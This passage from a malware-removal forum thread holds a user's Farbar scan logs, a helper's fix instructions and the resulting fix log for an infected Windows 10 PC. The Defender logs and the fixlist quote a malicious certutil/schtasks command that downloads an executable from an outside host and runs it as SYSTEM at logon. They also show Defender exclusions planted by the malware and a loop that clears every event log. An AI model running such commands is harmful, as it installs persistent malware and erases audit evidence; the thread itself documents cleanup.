Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.

Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-24 19:12:13.754
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:12:11.511
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:55.432
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win32/Bomitag.D!ml
ID: 2147741007
Severity: Severe
Category: Trojan
Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.663
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.626
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...51&enterprise=0
Name: BrowserModifier:Win32/Neobar
ID: 225451
Severity: High
Category: Browser Modifier
Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-10-29 09:57:25.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-08-03 12:16:27.456
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-08 12:00:17.288
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-05-04 12:47:46.475
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-03-15 11:40:11.320
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-26 12:31:13.039
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 26%
Total physical RAM: 16331.55 MB
Available physical RAM: 12012.87 MB
Total Virtual: 16631.55 MB
Available Virtual: 10766.25 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS
Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS
Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================


#2
RKinner

    Malware Expert

Download the attached fixlist.txt to the same location as FRST



Run FRST and press Fix
A fix log will be generated; please post that.

Reboot if the fix doesn't reboot it for you

Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.

 


#3
spra

    Member

  • Topic Starter

I ran FRST64 and rebooted. It did not reboot properly in Windows 10. Started in DOS/BIOS (I don't know), where my cordless mouse did not work, so I had to use only my keyboard.
Finally I managed to start Windows. Then I had problems connecting to Google (they wanted to see if I am a robot, which I am not!) so they let me enter, and here I am.

I am not sure if I did something wrong, but after rebooting and finding Fixlog.txt, which I copy here, and restarting FRST64, it says "No fixlist.txt found". I can't find any fixlist myself, only the fixlog, which is in the same directory as FRST. Anyway, the fixlog.txt is below. If you want me to repeat any steps please let me know.


Fix result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (25-11-2019 01:28:09) Run:1
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]
FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
C:\Users\SR\AppData\Roaming\EpicNet
EmptyTemp:
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:


*****************

"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GreenResonance" => removed successfully
"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7890540" => removed successfully
"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B6C27676-7B71-492F-BB86-892E15752F97}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B6C27676-7B71-492F-BB86-892E15752F97}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C789D50A-A2A0-405F-B279-A59DBA0D126E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C789D50A-A2A0-405F-B279-A59DBA0D126E}" => removed successfully
C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{42CF4929-54EE-42D2-B729-F538516C85C2}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42CF4929-54EE-42D2-B729-F538516C85C2}" => removed successfully
C:\Windows\System32\Tasks\JumpingBytes\PureSyncVSS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JumpingBytes\PureSyncVSS" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC559262-3918-4E5A-B027-44ED71265B49}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC559262-3918-4E5A-B027-44ED71265B49}" => removed successfully
C:\Windows\System32\Tasks\JumpingBytes\PureSyncExit => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JumpingBytes\PureSyncExit" => removed successfully
C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi => moved successfully
"HKLM\Software\MozillaPlugins\@itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd" => not found
C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll => moved successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd" => not found
"C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll" => not found
Winmon => Unable to stop service.
HKLM\System\CurrentControlSet\Services\Winmon => removed successfully
Winmon => service removed successfully
WinmonFS => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinmonFS => removed successfully
WinmonFS => service removed successfully
WinmonProcessMonitor => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
C:\Users\SR\AppData\Roaming\EpicNet Inc => moved successfully
"C:\Windows\system32\Tasks\csrss" => not found
C:\Program Files (x86)\Multitimer => moved successfully
C:\Program Files (x86)\Hadadn => moved successfully
C:\Windows\system32\ntkrnlmp.exe => moved successfully
C:\Windows\system32\osloader.efi => moved successfully
C:\Windows\system32\Drivers\WinmonProcessMonitor.sys => moved successfully
"C:\Windows\system32\Tasks\ScheduledUpdate" => not found
C:\Users\SR\AppData\Roaming\Microleaves => moved successfully
C:\Users\SR\AppData\Local\AdvinstAnalytics => moved successfully
C:\ProgramData\TEMP => ":907E90B1" ADS removed successfully
C:\Users\SR\AppData\Local\OPTvJO7k => ":lSGoicsydMwI75AardtQAZCSFhB" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CB2B1E04-1443-4466-A2D4-6FECE639BD29}" => removed successfully
"C:\Users\SR\AppData\Roaming\EpicNet" => not found

========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========

Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 12083200 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 484061940 B
Java, Flash, Steam htmlcache => 40572686 B
Windows/system/drivers => 90331588 B
Edge => 12057086 B
Chrome => 0 B
Firefox => 2325660479 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 6656 B
ProgramData => 6656 B
Public => 6656 B
systemprofile => 6656 B
systemprofile32 => 6656 B
LocalService => 15978 B
NetworkService => 20810984 B
SR => 256639629 B
Administrator => 256706531 B

RecycleBin => 0 B
EmptyTemp: => 3.3 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 01:34:52 ====



#4
RKinner

    Malware Expert

Run FRST again (make sure you have Addition.txt checked) and hit SCAN. You will get two logs; please post both.

 

(Once you run a FRST Fix it automatically deletes the downloaded fixlist.txt.  Looks like you did it correctly.  Don't know why you had boot problems but might be because of the malware.)



#5
spra

    Member

  • Topic Starter

Thank you. Sorry for the delay, but I had to sleep a few hours. It was night here.
The malware has stopped opening windows.
Here are the two logs.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (25-11-2019 10:21:27)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied)  [File not signed] C:\Windows\windefender.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(EpicNet Inc.) [File not signed] C:\Users\SR\AppData\Local\Temp\csrss\cloudnet.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.17920.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
